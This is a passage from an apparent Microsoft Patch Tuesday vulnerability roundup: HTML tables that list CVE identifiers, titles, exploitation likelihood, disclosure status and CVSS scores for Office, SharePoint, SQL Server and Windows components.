vulnerabilities</h3><table><thead><tr><th><p>CVE</p></th><th><p>Title</p></th><th><p>Exploitation status</p></th><th><p>Publicly disclosed?</p></th><th><p>CVSS v3 base score</p></th></tr></thead><tbody><tr><td><a href="https://msrc.microsoft.com/update-guide/en-US/advisory/CVE-2026-20946">CVE-2026-20946</a></td><td><p>Microsoft Excel Remote Code Execution Vulnerability</p></td><td><p>Exploitation Less Likely</p></td><td><p>No</p></td><td><p>7.8</p></td></tr><tr><td><a href="https://msrc.microsoft.com/update-guide/en-US/advisory/CVE-2026-20955">CVE-2026-20955</a></td><td><p>Microsoft Excel Remote Code Execution Vulnerability</p></td><td><p>Exploitation Less Likely</p></td><td><p>No</p></td><td><p>7.8</p></td></tr><tr><td><a href="https://msrc.microsoft.com/update-guide/en-US/advisory/CVE-2026-20956">CVE-2026-20956</a></td><td><p>Microsoft Excel Remote Code Execution Vulnerability</p></td><td><p>Exploitation Less Likely</p></td><td><p>No</p></td><td><p>7.8</p></td></tr><tr><td><a href="https://msrc.microsoft.com/update-guide/en-US/advisory/CVE-2026-20950">CVE-2026-20950</a></td><td><p>Microsoft Excel Remote Code Execution Vulnerability</p></td><td><p>Exploitation Less Likely</p></td><td><p>No</p></td><td><p>7.8</p></td></tr><tr><td><a href="https://msrc.microsoft.com/update-guide/en-US/advisory/CVE-2026-20957">CVE-2026-20957</a></td><td><p>Microsoft Excel Remote Code Execution Vulnerability</p></td><td><p>Exploitation Less Likely</p></td><td><p>No</p></td><td><p>7.8</p></td></tr><tr><td><a href="https://msrc.microsoft.com/update-guide/en-US/advisory/CVE-2026-20949">CVE-2026-20949</a></td><td><p>Microsoft Excel Security Feature Bypass Vulnerability</p></td><td><p>Exploitation Less Likely</p></td><td><p>No</p></td><td><p>7.8</p></td></tr><tr><td><a href="https://msrc.microsoft.com/update-guide/en-US/advisory/CVE-2026-20943">CVE-2026-20943</a></td><td><p>Microsoft Office Click-To-Run Elevation of Privilege Vulnerability</p></td><td><p>Exploitation Less Likely</p></td><td><p>No</p></td><td><p>7.0</p></td></tr><tr><td><a href="https://msrc.microsoft.com/update-guide/en-US/advisory/CVE-2026-20953">CVE-2026-20953</a></td><td><p>Microsoft Office Remote Code Execution Vulnerability</p></td><td><p>Exploitation Less Likely</p></td><td><p>No</p></td><td><p>8.4</p></td></tr><tr><td><a href="https://msrc.microsoft.com/update-guide/en-US/advisory/CVE-2026-20952">CVE-2026-20952</a></td><td><p>Microsoft Office Remote Code Execution Vulnerability</p></td><td><p>Exploitation Less Likely</p></td><td><p>No</p></td><td><p>8.4</p></td></tr><tr><td><a href="https://msrc.microsoft.com/update-guide/en-US/advisory/CVE-2026-20958">CVE-2026-20958</a></td><td><p>Microsoft SharePoint Information Disclosure Vulnerability</p></td><td><p>Exploitation Less Likely</p></td><td><p>No</p></td><td><p>5.4</p></td></tr><tr><td><a href="https://msrc.microsoft.com/update-guide/en-US/advisory/CVE-2026-20963">CVE-2026-20963</a></td><td><p>Microsoft SharePoint Remote Code Execution Vulnerability</p></td><td><p>Exploitation Less Likely</p></td><td><p>No</p></td><td><p>8.8</p></td></tr><tr><td><a href="https://msrc.microsoft.com/update-guide/en-US/advisory/CVE-2026-20951">CVE-2026-20951</a></td><td><p>Microsoft SharePoint Server Remote Code Execution Vulnerability</p></td><td><p>Exploitation Less Likely</p></td><td><p>No</p></td><td><p>7.8</p></td></tr><tr><td><a href="https://msrc.microsoft.com/update-guide/en-US/advisory/CVE-2026-20947">CVE-2026-20947</a></td><td><p>Microsoft SharePoint Server Remote Code Execution Vulnerability</p></td><td><p>Exploitation Unlikely</p></td><td><p>No</p></td><td><p>8.8</p></td></tr><tr><td><a href="https://msrc.microsoft.com/update-guide/en-US/advisory/CVE-2026-20959">CVE-2026-20959</a></td><td><p>Microsoft SharePoint Server Spoofing Vulnerability</p></td><td><p>Exploitation Less Likely</p></td><td><p>No</p></td><td><p>4.6</p></td></tr><tr><td><a href="https://msrc.microsoft.com/update-guide/en-US/advisory/CVE-2026-20944">CVE-2026-20944</a></td><td><p>Microsoft Word Remote Code Execution Vulnerability</p></td><td><p>Exploitation Less Likely</p></td><td><p>No</p></td><td><p>8.4</p></td></tr><tr><td><a href="https://msrc.microsoft.com/update-guide/en-US/advisory/CVE-2026-20948">CVE-2026-20948</a></td><td><p>Microsoft Word Remote Code Execution Vulnerability</p></td><td><p>Exploitation Less Likely</p></td><td><p>No</p></td><td><p>7.8</p></td></tr></tbody></table><h3>SQL Server vulnerabilities</h3><table><thead><tr><th><p>CVE</p></th><th><p>Title</p></th><th><p>Exploitation status</p></th><th><p>Publicly disclosed?</p></th><th><p>CVSS v3 base score</p></th></tr></thead><tbody><tr><td><a href="https://msrc.microsoft.com/update-guide/en-US/advisory/CVE-2026-20803">CVE-2026-20803</a></td><td><p>Microsoft SQL Server Elevation of Privilege Vulnerability</p></td><td><p>Exploitation Less Likely</p></td><td><p>No</p></td><td><p>7.2</p></td></tr></tbody></table><h3>Windows vulnerabilities</h3><table><thead><tr><th><p>CVE</p></th><th><p>Title</p></th><th><p>Exploitation status</p></th><th><p>Publicly disclosed?</p></th><th><p>CVSS v3 base score</p></th></tr></thead><tbody><tr><td><a href="https://msrc.microsoft.com/update-guide/en-US/advisory/CVE-2026-20815">CVE-2026-20815</a></td><td><p>Capability Access Management Service (camsvc) Elevation of Privilege Vulnerability</p></td><td><p>Exploitation Less Likely</p></td><td><p>No</p></td><td><p>7.0</p></td></tr><tr><td><a href="https://msrc.microsoft.com/update-guide/en-US/advisory/CVE-2026-20830">CVE-2026-20830</a></td><td><p>Capability Access Management Service (camsvc) Elevation of Privilege Vulnerability</p></td><td><p>Exploitation Unlikely</p></td><td><p>No</p></td><td><p>7.0</p></td></tr><tr><td><a href="https://msrc.microsoft.com/update-guide/en-US/advisory/CVE-2026-21221">CVE-2026-21221</a></td><td><p>Capability Access Management Service (camsvc) Elevation of Privilege Vulnerability</p></td><td><p>Exploitation Unlikely</p></td><td><p>No</p></td><td><p>7.0</p></td></tr><tr><td><a href="https://msrc.microsoft.com/update-guide/en-US/advisory/CVE-2026-20835">CVE-2026-20835</a></td><td><p>Capability Access Management Service (camsvc) Information Disclosure Vulnerability</p></td><td><p>Exploitation Less Likely</p></td><td><p>No</p></td><td><p>5.5</p></td></tr><tr><td><a href="https://msrc.microsoft.com/update-guide/en-US/advisory/CVE-2026-20851">CVE-2026-20851</a></td><td><p>Capability Access Management Service (camsvc) Information Disclosure Vulnerability</p></td><td><p>Exploitation Less Likely</p></td><td><p>No</p></td><td><p>6.2</p></td></tr><tr><td><a href="https://msrc.microsoft.com/update-guide/en-US/advisory/CVE-2026-20805">CVE-2026-20805</a></td><td><p>Desktop Window Manager Information Disclosure Vulnerability</p></td><td><p>Exploitation Detected</p></td><td><p>No</p></td><td><p>5.5</p></td></tr><tr><td><a href="https://msrc.microsoft.com/update-guide/en-US/advisory/CVE-2026-20871">CVE-2026-20871</a></td><td><p>Desktop Windows Manager Elevation of Privilege Vulnerability</p></td><td><p>Exploitation More Likely</p></td><td><p>No</p></td><td><p>7.8</p></td></tr><tr><td><a href="https://msrc.microsoft.com/update-guide/en-US/advisory/CVE-2026-20814">CVE-2026-20814</a></td><td><p>DirectX Graphics Kernel Elevation of Privilege Vulnerability</p></td><td><p>Exploitation Less Likely</p></td><td><p>No</p></td><td><p>7.0</p></td></tr><tr><td><a href="https://msrc.microsoft.com/update-guide/en-US/advisory/CVE-2026-20836">CVE-2026-20836</a></td><td><p>DirectX Graphics Kernel Elevation of Privilege Vulnerability</p></td><td><p>Exploitation Less Likely</p></td><td><p>No</p></td><td><p>7.0</p></td></tr><tr><td><a href="https://msrc.microsoft.com/update-guide/en-US/advisory/CVE-2026-20962">CVE-2026-20962</a></td><td><p>Dynamic Root of Trust for Measurement (DRTM) Information Disclosure Vulnerability</p></td><td><p>Exploitation Less Likely</p></td><td><p>No</p></td><td><p>4.4</p></td></tr><tr><td><a href="https://msrc.microsoft.com/update-guide/en-US/advisory/CVE-2026-20941">CVE-2026-20941</a></td><td><p>Host Process for Windows Tasks Elevation of Privilege Vulnerability</p></td><td><p>Exploitation Less Likely</p></td><td><p>No</p></td><td><p>7.8</p></td></tr><tr><td><a href="https://msrc.microsoft.com/update-guide/en-US/advisory/CVE-2026-20812">CVE-2026-20812</a></td><td><p>LDAP Tampering Vulnerability</p></td><td><p>Exploitation Less Likely</p></td><td><p>No</p></td><td><p>6.5</p></td></tr><tr><td><a href="https://msrc.microsoft.com/update-guide/en-US/advisory/CVE-2026-20842">CVE-2026-20842</a></td><td><p>Microsoft DWM Core Library Elevation of Privilege Vulnerability</p></td><td><p>Exploitation Less Likely</p></td><td><p>No</p></td><td><p>7.0</p></td></tr><tr><td><a href="https://msrc.microsoft.com/update-guide/en-US/advisory/CVE-2026-20847">CVE-2026-20847</a></td><td><p>Microsoft Windows File Explorer Spoofing Vulnerability</p></td><td><p>Exploitation Unlikely</p></td><td><p>No</p></td><td><p>6.5</p></td></tr><tr><td><a href="https://msrc.microsoft.com/update-guide/en-US/advisory/CVE-2023-31096">CVE-2023-31096</a></td><td><p>MITRE: CVE-2023-31096 Windows Agere Soft Modem Driver Elevation of Privilege Vulnerability</p></td><td><p>Exploitation More Likely</p></td><td><p>Yes</p></td><td><p>7.8</p></td></tr><tr><td><a href="https://msrc.microsoft.com/update-guide/en-US/advisory/CVE-2026-20925">CVE-2026-20925</a></td><td><p>NTLM Hash Disclosure Spoofing Vulnerability</p></td><td><p>Exploitation Less Likely</p></td><td><p>No</p></td><td><p>6.5</p></td></tr><tr><td><a href="https://msrc.microsoft.com/update-guide/en-US/advisory/CVE-2026-20872">CVE-2026-20872</a></td><td><p>NTLM Hash Disclosure Spoofing Vulnerability</p></td><td><p>Exploitation Less Likely</p></td><td><p>No</p></td><td><p>6.5</p></td></tr><tr><td><a href="https://msrc.microsoft.com/update-guide/en-US/advisory/CVE-2026-20821">CVE-2026-20821</a></td><td><p>Remote Procedure Call Information Disclosure Vulnerability</p></td><td><p>Exploitation Unlikely</p></td><td><p>No</p></td><td><p>6.2</p></td></tr><tr><td><a href="https://msrc.microsoft.com/update-guide/en-US/advisory/CVE-2026-21265">CVE-2026-21265</a></td><td><p>Secure Boot Certificate Expiration Security Feature Bypass Vulnerability</p></td><td><p>Exploitation Less Likely</p></td><td><p>Yes</p></td><td><p>6.4</p></td></tr><tr><td><a href="https://msrc.microsoft.com/update-guide/en-US/advisory/CVE-2026-20826">CVE-2026-20826</a></td><td><p>Tablet Windows User Interface (TWINUI) Subsystem Information Disclosure Vulnerability</p></td><td><p>Exploitation Less Likely</p></td><td><p>No</p></td><td><p>7.8</p></td></tr><tr><td><a href="https://msrc.microsoft.com/update-guide/en-US/advisory/CVE-2026-20827">CVE-2026-20827</a></td><td><p>Tablet Windows User Interface (TWINUI) Subsystem Information Disclosure Vulnerability</p></td><td><p>Exploitation Unlikely</p></td><td><p>No</p></td><td><p>5.5</p></td></tr><tr><td><a href="https://msrc.microsoft.com/update-guide/en-US/advisory/CVE-2026-20829">CVE-2026-20829</a></td><td><p>TPM Trustlet Information Disclosure Vulnerability</p></td><td><p>Exploitation Less Likely</p></td><td><p>No</p></td><td><p>5.5</p></td></tr><tr><td><a href="https://msrc.microsoft.com/update-guide/en-US/advisory/CVE-2026-20811">CVE-2026-20811</a></td><td><p>Win32k Elevation of Privilege Vulnerability</p></td><td><p>Exploitation Less Likely</p></td><td><p>No</p></td><td><p>7.8</p></td></tr><tr><td><a href="https://msrc.microsoft.com/update-guide/en-US/advisory/CVE-2026-20920">CVE-2026-20920</a></td><td><p>Win32k Elevation of Privilege Vulnerability</p></td><td><p>Exploitation Unlikely</p></td><td><p>No</p></td><td><p>7.8</p></td></tr><tr><td><a href="https://msrc.microsoft.com/update-guide/en-US/advisory/CVE-2026-20863">CVE-2026-20863</a></td><td><p>Win32k Elevation of Privilege Vulnerability</p></td><td><p>Exploitation Less Likely</p></td><td><p>No</p></td><td><p>7.0</p></td></tr><tr><td><a href="https://msrc.microsoft.com/update-guide/en-US/advisory/CVE-2026-20810">CVE-2026-20810</a></td><td><p>Windows Ancillary Function Driver for WinSock Elevation of Privilege Vulnerability</p></td><td><p>Exploitation Less Likely</p></td><td><p>No</p></td><td><p>7.8</p></td></tr><tr><td><a href="https://msrc.microsoft.com/update-guide/en-US/advisory/CVE-2026-20831">CVE-2026-20831</a></td><td><p>Windows Ancillary Function Driver for WinSock Elevation of Privilege Vulnerability</p></td><td><p>Exploitation Less Likely</p></td><td><p>No</p></td><td><p>7.8</p></td></tr><tr><td><a href="https://msrc.microsoft.com/update-guide/en-US/advisory/CVE-2026-20860">CVE-2026-20860</a></td><td><p>Windows Ancillary Function Driver for WinSock Elevation of Privilege Vulnerability</p></td><td><p>Exploitation More Likely</p></td><td><p>No</p></td><td><p>7.8</p></td></tr><tr><td><a href="https://msrc.microsoft.com/update-guide/en-US/advisory/CVE-2026-20839">CVE-2026-20839</a></td><td><p>Windows Client-Side Caching (CSC) Service Information Disclosure Vulnerability</p></td><td><p>Exploitation Unlikely</p></td><td><p>No</p></td><td><p>5.5</p></td></tr><tr><td><a href="https://msrc.microsoft.com/update-guide/en-US/advisory/CVE-2026-20844">CVE-2026-20844</a></td><td><p>Windows Clipboard Server Elevation of Privilege Vulnerability</p></td><td><p>Exploitation Less Likely</p></td><td><p>No</p></td><td><p>7.4</p></td></tr><tr><td><a href="https://msrc.microsoft.com/update-guide/en-US/advisory/CVE-2026-20857">CVE-2026-20857</a></td><td><p>Windows Cloud Files Mini Filter Driver Elevation of Privilege Vulnerability</p></td><td><p>Exploitation Unlikely</p></td><td><p>No</p></td><td><p>7.8</p></td></tr><tr><td><a href="https://msrc.microsoft.com/update-guide/en-US/advisory/CVE-2026-20940">CVE-2026-20940</a></td><td><p>Windows Cloud Files Mini Filter Driver Elevation of Privilege Vulnerability</p></td><td><p>Exploitation Unlikely</p></td><td><p>No</p></td><td><p>7.8</p></td></tr><tr><td><a href="https://msrc.microsoft.com/update-guide/en-US/advisory/CVE-2026-20820">CVE-2026-20820</a></td><td><p>Windows Common Log File System Driver Elevation of Privilege Vulnerability</p></td><td><p>Exploitation More Likely</p></td><td><p>No</p></td><td><p>7.8</p></td></tr><tr><td><a href="https://msrc.microsoft.com/update-guide/en-US/advisory/CVE-2026-20864">CVE-2026-20864</a></td><td><p>Windows Connected Devices Platform Service Elevation of Privilege Vulnerability</p></td><td><p>Exploitation Unlikely</p></td><td><p>No</p></td><td><p>7.8</p></td></tr><tr><td><a href="https://msrc.microsoft.com/update-guide/en-US/advisory/CVE-2026-0386">CVE-2026-0386</a></td><td><p>Windows Deployment Services Remote Code Execution Vulnerability</p></td><td><p>Exploitation Unlikely</p></td><td><p>No</p></td><td><p>7.5</p></td></tr><tr><td><a href="https://msrc.microsoft.com/update-guide/en-US/advisory/CVE-2026-20817">CVE-2026-20817</a></td><td><p>Windows Error Reporting Service Elevation of Privilege Vulnerability</p></td><td><p>Exploitation More Likely</p></td><td><p>No</p></td><td><p>7.8</p></td></tr><tr><td><a href="https://msrc.microsoft.com/update-guide/en-US/advisory/CVE-2026-20808">CVE-2026-20808</a></td><td><p>Windows File Explorer Elevation of Privilege Vulnerability</p></td><td><p>Exploitation Less Likely</p></td><td><p>No</p></td><td><p>7.0</p></td></tr><tr><td><a href="https://msrc.microsoft.com/update-guide/en-US/advisory/CVE-2026-20823">CVE-2026-20823</a></td><td><p>Windows File Explorer Information Disclosure Vulnerability</p></td><td><p>Exploitation Unlikely</p></td><td><p>No</p></td><td><p>5.5</p></td></tr><tr><td><a href="https://msrc.microsoft.com/update-guide/en-US/advisory/CVE-2026-20932">CVE-2026-20932</a></td><td><p>Windows File Explorer Information Disclosure Vulnerability</p></td><td><p>Exploitation Unlikely</p></td><td><p>No</p></td><td><p>5.5</p></td></tr><tr><td><a href="https://msrc.microsoft.com/update-guide/en-US/advisory/CVE-2026-20937">CVE-2026-20937</a></td><td><p>Windows File Explorer Information Disclosure Vulnerability</p></td><td><p>Exploitation Unlikely</p></td><td><p>No</p></td><td><p>5.5</p></td></tr><tr><td><a href="https://msrc.microsoft.com/update-guide/en-US/advisory/CVE-2026-20939">CVE-2026-20939</a></td><td><p>Windows File Explorer Information Disclosure Vulnerability</p></td><td><p>Exploitation Unlikely</p></td><td><p>No</p></td><td><p>5.5</p></td></tr><tr><td><a href="https://msrc.microsoft.com/update-guide/en-US/advisory/CVE-2026-20822">CVE-2026-20822</a></td><td><p>Windows Graphics Component Elevation of Privilege Vulnerability</p></td><td><p>Exploitation Less Likely</p></td><td><p>No</p></td><td><p>7.8</p></td></tr><tr><td><a href="https://msrc.microsoft.com/update-guide/en-US/advisory/CVE-2026-20804">CVE-2026-20804</a></td><td><p>Windows Hello Tampering Vulnerability</p></td><td><p>Exploitation Unlikely</p></td><td><p>No</p></td><td><p>7.7</p></td></tr><tr><td><a href="https://msrc.microsoft.com/update-guide/en-US/advisory/CVE-2026-20852">CVE-2026-20852</a></td><td><p>Windows Hello Tampering Vulnerability</p></td><td><p>Exploitation Less Likely</p></td><td><p>No</p></td><td><p>7.7</p></td></tr><tr><td><a href="https://msrc.microsoft.com/update-guide/en-US/advisory/CVE-2026-20929">CVE-2026-20929</a></td><td><p>Windows HTTP.sys Elevation of Privilege Vulnerability</p></td><td><p>Exploitation Unlikely</p></td><td><p>No</p></td><td><p>7.5</p></td></tr><tr><td><a href="https://msrc.microsoft.com/update-guide/en-US/advisory/CVE-2026-20825">CVE-2026-20825</a></td><td><p>Windows Hyper-V Information Disclosure Vulnerability</p></td><td><p>Exploitation Less Likely</p></td><td><p>No</p></td><td><p>4.4</p></td></tr><tr><td><a href="https://msrc.microsoft.com/update-guide/en-US/advisory/CVE-2026-20816">CVE-2026-20816</a></td><td><p>Windows Installer Elevation of Privilege Vulnerability</p></td><td><p>Exploitation More Likely</p></td><td><p>No</p></td><td><p>7.8</p></td></tr><tr><td><a href="https://msrc.microsoft.com/update-guide/en-US/advisory/CVE-2026-20849">CVE-2026-20849</a></td><td><p>Windows Kerberos Elevation of Privilege Vulnerability</p></td><td><p>Exploitation Unlikely</p></td><td><p>No</p></td><td><p>7.5</p></td></tr><tr><td><a href="https://msrc.microsoft.com/update-guide/en-US/advisory/CVE-2026-20833">CVE-2026-20833</a></td><td><p>Windows Kerberos Information Disclosure Vulnerability</p></td><td><p>Exploitation Less Likely</p></td><td><p>No</p></td><td><p>5.5</p></td></tr><tr><td><a href="https://msrc.microsoft.com/update-guide/en-US/advisory/CVE-2026-20818">CVE-2026-20818</a></td><td><p>Windows Kernel Information Disclosure Vulnerability</p></td><td><p>Exploitation Unlikely</p></td><td><p>No</p></td><td><p>6.2</p></td></tr><tr><td><a href="https://msrc.microsoft.com/update-guide/en-US/advisory/CVE-2026-20838">CVE-2026-20838</a></td><td><p>Windows Kernel Information Disclosure Vulnerability</p></td><td><p>Exploitation Less Likely</p></td><td><p>No</p></td><td><p>5.5</p></td></tr><tr><td><a href="https://msrc.microsoft.com/update-guide/en-US/advisory/CVE-2026-20809">CVE-2026-20809</a></td><td><p>Windows Kernel Memory Elevation of Privilege Vulnerability</p></td><td><p>Exploitation Less Likely</p></td><td><p>No</p></td><td><p>7.8</p></td></tr><tr><td><a href="https://msrc.microsoft.com/update-guide/en-US/advisory/CVE-2026-20859">CVE-2026-20859</a></td><td><p>Windows Kernel-Mode Driver Elevation of Privilege Vulnerability</p></td><td><p>Exploitation Less Likely</p></td><td><p>No</p></td><td><p>7.8</p></td></tr><tr><td><a href="https://msrc.microsoft.com/update-guide/en-US/advisory/CVE-2026-20875">CVE-2026-20875</a></td><td><p>Windows Local Security Authority Subsystem Service (LSASS) Denial of Service Vulnerability</p></td><td><p>Exploitation Less Likely</p></td><td><p>No</p></td><td><p>7.5</p></td></tr><tr><td><a href="https://msrc.microsoft.com/update-guide/en-US/advisory/CVE-2026-20854">CVE-2026-20854</a></td><td><p>Windows Local Security Authority Subsystem Service (LSASS) Remote Code Execution Vulnerability</p></td><td><p>Exploitation Less Likely</p></td><td><p>No</p></td><td><p>7.5</p></td></tr><tr><td><a href="https://msrc.microsoft.com/update-guide/en-US/advisory/CVE-2026-20869">CVE-2026-20869</a></td><td><p>Windows Local Session Manager (LSM) Elevation of Privilege Vulnerability</p></td><td><p>Exploitation Less Likely</p></td><td><p>No</p></td><td><p>7.0</p></td></tr><tr><td><a href="https://msrc.microsoft.com/update-guide/en-US/advisory/CVE-2026-20858">CVE-2026-20858</a></td><td><p>Windows Management Services Elevation of Privilege Vulnerability</p></td><td><p>Exploitation Less Likely</p></td><td><p>No</p></td><td><p>7.8</p></td></tr><tr><td><a href="https://msrc.microsoft.com/update-guide/en-US/advisory/CVE-2026-20865">CVE-2026-20865</a></td><td><p>Windows Management Services Elevation of Privilege Vulnerability</p></td><td><p>Exploitation Less Likely</p></td><td><p>No</p></td><td><p>7.8</p></td></tr><tr><td><a href="https://msrc.microsoft.com/update-guide/en-US/advisory/CVE-2026-20877">CVE-2026-20877</a></td><td><p>Windows Management Services Elevation of Privilege Vulnerability</p></td><td><p>Exploitation Less Likely</p></td><td><p>No</p></td><td><p>7.8</p></td></tr><tr><td><a href="https://msrc.microsoft.com/update-guide/en-US/advisory/CVE-2026-20918">CVE-2026-20918</a></td><td><p>Windows Management Services Elevation of Privilege Vulnerability</p></td><td><p>Exploitation Unlikely</p></td><td><p>No</p></td><td><p>7.8</p></td></tr><tr><td><a href="https://msrc.microsoft.com/update-guide/en-US/advisory/CVE-2026-20923">CVE-2026-20923</a></td><td><p>Windows Management Services Elevation of Privilege Vulnerability</p></td><td><p>Exploitation Less Likely</p></td><td><p>No</p></td><td><p>7.8</p></td></tr><tr><td><a href="https://msrc.microsoft.com/update-guide/en-US/advisory/CVE-2026-20924">CVE-2026-20924</a></td><td><p>Windows Management Services Elevation of Privilege Vulnerability</p></td><td><p>Exploitation Less Likely</p></td><td><p>No</p></td><td><p>7.8</p></td></tr><tr><td><a href="https://msrc.microsoft.com/update-guide/en-US/advisory/CVE-2026-20861">CVE-2026-20861</a></td><td><p>Windows Management Services Elevation of Privilege Vulnerability</p></td><td><p>Exploitation Less Likely</p></td><td><p>No</p></td><td><p>7.8</p></td></tr><tr><td><a href="https://msrc.microsoft.com/update-guide/en-US/advisory/CVE-2026-20866">CVE-2026-20866</a></td><td><p>Windows Management Services Elevation of Privilege Vulnerability</p></td><td><p>Exploitation Less Likely</p></td><td><p>No</p></td><td><p>7.8</p></td></tr><tr><td><a href="https://msrc.microsoft.com/update-guide/en-US/advisory/CVE-2026-20867">CVE-2026-20867</a></td><td><p>Windows Management Services Elevation of Privilege Vulnerability</p></td><td><p>Exploitation Unlikely</p></td><td><p>No</p></td><td><p>7.8</p></td></tr><tr><td><a href="https://msrc.microsoft.com/update-guide/en-US/advisory/CVE-2026-20873">CVE-2026-20873</a></td><td><p>Windows Management Services Elevation of Privilege Vulnerability</p></td><td><p>Exploitation Less Likely</p></td><td><p>No</p></td><td><p>7.8</p></td></tr><tr><td><a href="https://msrc.microsoft.com/update-guide/en-US/advisory/CVE-2026-20874">CVE-2026-20874</a></td><td><p>Windows Management Services Elevation of Privilege Vulnerability</p></td><td><p>Exploitation Less Likely</p></td><td><p>No</p></td><td><p>7.8</p></td></tr><tr><td><a href="https://msrc.microsoft.com/update-guide/en-US/advisory/CVE-2026-20862">CVE-2026-20862</a></td><td><p>Windows Management Services Information Disclosure Vulnerability</p></td><td><p>Exploitation Unlikely</p></td><td><p>No</p></td><td><p>5.5</p></td></tr><tr><td><a href="https://msrc.microsoft.com/update-guide/en-US/advisory/CVE-2026-20837">CVE-2026-20837</a></td><td><p>Windows Media Remote Code Execution Vulnerability</p></td><td><p>Exploitation Less Likely</p></td><td><p>No</p></td><td><p>7.8</p></td></tr><tr><td><a href="https://msrc.microsoft.com/update-guide/en-US/advisory/CVE-2024-55414">CVE-2024-55414</a></td><td><p>Windows Motorola Soft Modem Driver Elevation of Privilege Vulnerability</p></td><td><p>Exploitation Unlikely</p></td><td><p>No</p></td><td><p>7.8</p></td></tr><tr><td><a href="https://msrc.microsoft.com/update-guide/en-US/advisory/CVE-2026-20936">CVE-2026-20936</a></td><td><p>Windows NDIS Information Disclosure Vulnerability</p></td><td><p>Exploitation Unlikely</p></td><td><p>No</p></td><td><p>4.3</p></td></tr><tr><td><a href="https://msrc.microsoft.com/update-guide/en-US/advisory/CVE-2026-20840">CVE-2026-20840</a></td><td><p>Windows NTFS Remote Code Execution Vulnerability</p></td><td><p>Exploitation More Likely</p></td><td><p>No</p></td><td><p>7.8</p></td></tr><tr><td><a href="https://msrc.microsoft.com/update-guide/en-US/advisory/CVE-2026-20922">CVE-2026-20922</a></td><td><p>Windows NTFS Remote Code Execution Vulnerability</p></td><td><p>Exploitation More Likely</p></td><td><p>No</p></td><td><p>7.8</p></td></tr><tr><td><a href="https://msrc.microsoft.com/update-guide/en-US/advisory/CVE-2026-20824">CVE-2026-20824</a></td><td><p>Windows Remote Assistance Security Feature Bypass Vulnerability</p></td><td><p>Exploitation Less Likely</p></td><td><p>No</p></td><td><p>5.5</p></td></tr><tr><td><a href="https://msrc.microsoft.com/update-guide/en-US/advisory/CVE-2026-20832">CVE-2026-20832</a></td><td><p>Windows Remote Procedure Call Interface Definition Language (IDL) Elevation of Privilege Vulnerability</p></td><td><p>Exploitation Less Likely</p></td><td><p>No</p></td><td><p>7.8</p></td></tr><tr><td><a href="https://msrc.microsoft.com/update-guide/en-US/advisory/CVE-2026-20828">CVE-2026-20828</a></td><td><p>Windows rndismp6.sys Information Disclosure Vulnerability</p></td><td><p>Exploitation Less Likely</p></td><td><p>No</p></td><td><p>4.6</p></td></tr><tr><td><a href="https://msrc.microsoft.com/update-guide/en-US/advisory/CVE-2026-20843">CVE-2026-20843</a></td><td><p>Windows Routing and Remote Access Service (RRAS) Elevation of Privilege Vulnerability</p></td><td><p>Exploitation More Likely</p></td><td><p>No</p></td><td><p>7.8</p></td></tr><tr><td><a href="https://msrc.microsoft.com/update-guide/en-US/advisory/CVE-2026-20868">CVE-2026-20868</a></td><td><p>Windows Routing and Remote Access Service (RRAS) Remote Code Execution Vulnerability</p></td><td><p>Exploitation Less Likely</p></td><td><p>No</p></td><td><p>8.8</p></td></tr><tr><td><a href="https://msrc.microsoft.com/update-guide/en-US/advisory/CVE-2026-20856">CVE-2026-20856</a></td><td><p>Windows Server Update Service (WSUS) Remote Code Execution Vulnerability</p></td><td><p>Exploitation Less Likely</p></td><td><p>No</p></td><td><p>8.1</p></td></tr><tr><td><a href="https://msrc.microsoft.com/update-guide/en-US/advisory/CVE-2026-20927">CVE-2026-20927</a></td><td><p>Windows SMB Server Denial of Service Vulnerability</p></td><td><p>Exploitation Unlikely</p></td><td><p>No</p></td><td><p>5.3</p></td></tr><tr><td><a href="https://msrc.microsoft.com/update-guide/en-US/advisory/CVE-2026-20919">CVE-2026-20919</a></td><td><p>Windows SMB Server Elevation of Privilege Vulnerability</p></td><td><p>Exploitation Unlikely</p></td><td><p>No</p></td><td><p>7.5</p></td></tr><tr><td><a href="https://msrc.microsoft.com/update-guide/en-US/advisory/CVE-2026-20921">CVE-2026-20921</a></td><td><p>Windows SMB Server Elevation of Privilege Vulnerability</p></td><td><p>Exploitation Unlikely</p></td><td><p>No</p></td><td><p>7.5</p></td></tr><tr><td><a href="https://msrc.microsoft.com/update-guide/en-US/advisory/CVE-2026-20926">CVE-2026-20926</a></td><td><p>Windows SMB Server Elevation of Privilege Vulnerability</p></td><td><p>Exploitation Unlikely</p></td><td><p>No</p></td><td><p>7.5</p></td></tr><tr><td><a href="https://msrc.microsoft.com/update-guide/en-US/advisory/CVE-2026-20934">CVE-2026-20934</a></td><td><p>Windows SMB Server Elevation of Privilege Vulnerability</p></td><td><p>Exploitation Unlikely</p></td><td><p>No</p></td><td><p>7.5</p></td></tr><tr><td><a href="https://msrc.microsoft.com/update-guide/en-US/advisory/CVE-2026-20848">CVE-2026-20848</a></td><td><p>Windows SMB Server Elevation of Privilege Vulnerability</p></td><td><p>Exploitation Unlikely</p></td><td><p>No</p></td><td><p>7.5</p></td></tr><tr><td><a href="https://msrc.microsoft.com/update-guide/en-US/advisory/CVE-2026-20834">CVE-2026-20834</a></td><td><p>Windows Spoofing Vulnerability</p></td><td><p>Exploitation Less Likely</p></td><td><p>No</p></td><td><p>4.6</p></td></tr><tr><td><a href="https://msrc.microsoft.com/update-guide/en-US/advisory/CVE-2026-20931">CVE-2026-20931</a></td><td><p>Windows Telephony Service Elevation of Privilege Vulnerability</p></td><td><p>Exploitation Unlikely</p></td><td><p>No</p></td><td><p>8.0</p></td></tr><tr><td><a href="https://msrc.microsoft.com/update-guide/en-US/advisory/CVE-2026-20876">CVE-2026-20876</a></td><td><p>Windows Virtualization-Based Security (VBS) Enclave Elevation of Privilege Vulnerability</p></td><td><p>Exploitation Less Likely</p></td><td><p>No</p></td><td><p>6.7</p></td></tr><tr><td><a href="https://msrc.microsoft.com/update-guide/en-US/advisory/CVE-2026-20938">CVE-2026-20938</a></td><td><p>Windows Virtualization-Based Security (VBS) Enclave Elevation of Privilege Vulnerability</p></td><td><p>Exploitation Less Likely</p></td><td><p>No</p></td><td><p>7.8</p></td></tr><tr><td><a href="https://msrc.microsoft.com/update-guide/en-US/advisory/CVE-2026-20819">CVE-2026-20819</a></td><td><p>Windows Virtualization-Based Security (VBS) Information Disclosure Vulnerability</p></td><td><p>Exploitation Less Likely</p></td><td><p>No</p></td><td><p>5.5</p></td></tr><tr><td><a href="https://msrc.microsoft.com/update-guide/en-US/advisory/CVE-2026-20935">CVE-2026-20935</a></td><td><p>Windows Virtualization-Based Security (VBS) Information Disclosure 